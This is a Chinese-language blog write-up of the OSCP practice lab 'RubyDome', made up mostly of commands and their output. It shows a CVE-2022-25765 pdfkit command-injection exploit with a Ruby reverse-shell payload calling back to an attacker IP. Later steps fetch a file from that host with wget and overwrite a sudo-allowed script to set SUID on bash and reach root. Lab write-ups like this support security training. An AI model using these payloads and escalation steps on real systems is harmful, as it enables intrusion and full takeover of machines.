OSCP靶场--RubyDome

0rch1d2024-03-30 10:46

OSCP靶场--RubyDome

考点(CVE-2022-25765 suid ruby提权)

1.nmap扫描

bash 复制代码 
┌──(root㉿kali)-[~/Desktop]
└─# nmap -Pn -sC -sV 192.168.249.22 --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-29 00:28 EDT
Nmap scan report for 192.168.249.22
Host is up (0.38s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
3000/tcp open  http    WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
|_http-title: RubyDome HTML to PDF
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.03 seconds

2.user priv

bash 复制代码 
##
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.249.22 - - [29/Mar/2024 00:33:00] "GET /test.html HTTP/1.1" 200 -

### 测试功能:
http://192.168.249.22:3000/

## google查找漏洞:rubydome exploit
https://github.com/UNICORDev/exploit-CVE-2022-25765
##

#######
## CVE-2022-35583 测试后发现是兔子洞:
https://github.com/advisories/GHSA-v2fj-q75c-65mr

###################
## 使用CVE-2022-25765反弹shell:
https://github.com/UNICORDev/exploit-CVE-2022-25765/blob/main/exploit-CVE-2022-25765.py


###################
##
┌──(root㉿kali)-[~/Desktop]
└─# python3 exploit-CVE-2022-25765.py -s 192.168.45.171 443 -w http://192.168.249.22:3000/pdf -p url 

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
UNICORD: Exploit for CVE-2022--25765 (pdfkit) - Command Injection
OPTIONS: Reverse Shell Sent to Target Website Mode
PAYLOAD: http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("192.168.45.171","443"))'`
LOCALIP: 192.168.45.171:443
WARNING: Be sure to start a local listener on the above IP and port. "nc -lnvp 443".
WEBSITE: http://192.168.249.22:3000/pdf
POSTARG: url
EXPLOIT: Payload sent to website!
SUCCESS: Exploit performed action.

######
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443                                                
listening on [any] 443 ...
192.168.249.22: inverse host lookup failed: Unknown host
connect to [192.168.45.171] from (UNKNOWN) [192.168.249.22] 35124
whoami
andrew
andrew@rubydome:~$ cat local.txt
cat local.txt
34095df9bf4237e08f9442df480866f1
andrew@rubydome:~$


这里发现是兔子洞:

反弹shell:burp抓包,exp调整:

3. root priv

bash 复制代码 
##
andrew@rubydome:~$ sudo -l
sudo -l
Matching Defaults entries for andrew on rubydome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User andrew may run the following commands on rubydome:
    (ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb


####################
##
andrew@rubydome:~$ sudo -l
sudo -l
Matching Defaults entries for andrew on rubydome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User andrew may run the following commands on rubydome:
    (ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb

### 当前用户可以读写/home/andrew/app/app.rb
andrew@rubydome:~$ ls -al /home/andrew/app/app.rb
ls -al /home/andrew/app/app.rb
-rwxrwx--- 1 andrew andrew 1032 Apr 24  2023 /home/andrew/app/app.rb

## 覆盖提权:kali:1.rb,开启http server:
system("chmod +s /bin/bash")

## 下载覆盖:
andrew@rubydome:~$ wget http://192.168.45.171/1.rb
wget http://192.168.45.171/1.rb
--2024-03-29 11:26:38--  http://192.168.45.171/1.rb
Connecting to 192.168.45.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29 [application/x-ruby]
Saving to: '1.rb'

1.rb                100%[===================>]      29  --.-KB/s    in 0s      

2024-03-29 11:26:39 (4.33 MB/s) - '1.rb' saved [29/29]

andrew@rubydome:~$ cat 1.rb > /home/andrew/app/app.rb
cat 1.rb > /home/andrew/app/app.rb
andrew@rubydome:~$ cat /home/andrew/app/app.rb
cat /home/andrew/app/app.rb
system("chmod +s /bin/bash")
andrew@rubydome:~$ sudo /usr/bin/ruby /home/andrew/app/app.rb
sudo /usr/bin/ruby /home/andrew/app/app.rb

## /bin/bash添加suid权限:
andrew@rubydome:~$ ls -al /bin/bash
ls -al /bin/bash
-rwsr-sr-x 1 root root 1396520 Jan  6  2022 /bin/bash
andrew@rubydome:~$ /bin/bash -p
/bin/bash -p
bash-5.1# id
id
uid=1001(andrew) gid=1001(andrew) euid=0(root) egid=0(root) groups=0(root),27(sudo),1001(andrew)
bash-5.1# cat /root/proof.txt
cat /root/proof.txt
a7f22b4d527dee98174daf20efbd168a
bash-5.1#

4.总结:

复制代码 
## CVE-2022-25765
https://github.com/UNICORDev/exploit-CVE-2022-25765/blob/main/exploit-CVE-2022-25765.py
## suid ruby提权:
https://gtfobins.github.io/gtfobins/ruby/#sudo
相关推荐
缘友一世2 小时前
漏洞扫描POC和web漏洞扫描工具
网络·安全·web安全
christine-rr3 小时前
linux常用命令(6)——网络管理
linux·服务器·网络·ubuntu·网络安全
合作小小程序员小小店5 小时前
Web渗透之身份认证与访问控制缺陷(越权(水平垂直),访问控制(没有验证),脆弱验证(Cookie,JWT,Session等))
安全·web安全·网络安全·asp.net·网络攻击模型
huluang5 小时前
网络安全等级保护要求(10+4 层面)记忆总结
服务器·网络·web安全
kali-Myon9 小时前
NewStarCTF2025-Week2-Web
web安全·sqlite·php·web·ctf·文件上传·文件包含
啦啦9117149 小时前
Wise Duplicate Finder查重清理软件!一键查重,支持批量处理!
5g·网络安全
旺仔Sec21 小时前
新疆维吾尔自治区第一届“丝路杯”网络安全大赛暨2026年新疆职业院校技能大赛网络安全赛项竞赛样题
安全·web安全
我不是QI21 小时前
DES 加密算法:核心组件、加解密流程与安全特性
经验分享·算法·安全·网络安全·密码学
搞科研的小刘选手1 天前
【通信&网络安全主题】第六届计算机通信与网络安全国际学术会议(CCNS 2025)
大数据·人工智能·网络安全·vr·通信工程·网络技术·计算机工程
Che_Che_1 天前
论文阅读-IDFUZZ: Intelligent Directed Grey-box Fuzzing
论文阅读·网络安全·模糊测试·定向模糊测试
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答04UV安装并设置国内源05GitLab 零基础入门指南:从安装到项目管理全流程06Linux下V2Ray安装配置指南0746个Nano-banana 精选提示词,持续更新中08在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)09windows找不到gpedit.msc(本地组策略编辑器)10Labelme从安装到标注:零基础完整指南